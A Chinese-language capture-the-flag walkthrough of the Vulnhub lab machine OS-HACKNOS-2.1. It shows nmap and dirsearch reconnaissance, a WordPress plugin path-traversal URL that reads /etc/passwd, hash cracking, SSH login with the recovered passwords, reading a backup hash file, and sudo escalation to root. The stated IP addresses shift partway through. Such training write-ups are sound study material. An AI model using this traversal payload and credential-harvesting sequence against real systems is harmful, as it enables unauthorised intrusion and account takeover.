Vulnhub靶机:OS-HACKNOS-2.1
kali IP:192.168.1.190
Target IP: 192.168.1.185
靶机下载:https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/
靶机目标:普通用户的user.txt
与root用户的root.txt
1.打开kali虚拟终端:ifconfig ,ip为192.168.1.41
2. 主机发现(以下246跟94属于同一个)
使用nmap扫描:nmap -sP -v 192.168.1.0/24 ,发现192.168.1.94是为目标IP地址
3.主机信息探测
nmap -sV 192.168.1.94 -O
开放22与80端口
4.网站探测
通过浏览器访问80端口发现为Apache安装默认页面
5.在github中下载目录爆破工具dirsearch
网址:https://github.com/maurosoria/dirsearch
6.使用dirsearch进行目录扫描 ./dirsearch.py -u http://192.168.1.94/
发现tsweb目录为WordPress站点...
7.Wpscan漏洞扫描网站
wpscan --url http://192.168.1.94/tsweb -e ap
8.访问漏洞地址:
https://www.exploit-db.com/exploits/46537
9.拼接地址
http://192.168.1.94/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
10.通过查看页面源代码的方式(ctrl+u),得知靶机存在3个用户:root、rohit、flag。注意到flag用户的密码占位符的位置中有$符号,说明是经过md5加密的
发现32行:
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash
11.破解用户密码
使用join破解flag用户的密码,得到密码:topsecret
注:join一旦破解出了密码,再次破解的话就不再显示破解结果,需要通过--show查看破解结果
12.进行SSH登录...并查找passwd文件中使用bash登录的用户为rohit并进行目录遍历发现该用户密码...
ssh flag@192.168.1.94
cat /etc/passwd | grep bash
cat /var/backups/passbkp/md5-hash
13.对rohit用户进行解密...并获取密码!%hack41
14.切换到rohit用户进入家目录发现user.txt发现当前用户具有sudo权限切换并进入到root用户家目录获取root.txt
su rohit登录,密码 !%hack41
cd
ls
cat user.txt
sudo su root(密码 !%hack41)
cd
ls
cat root.txt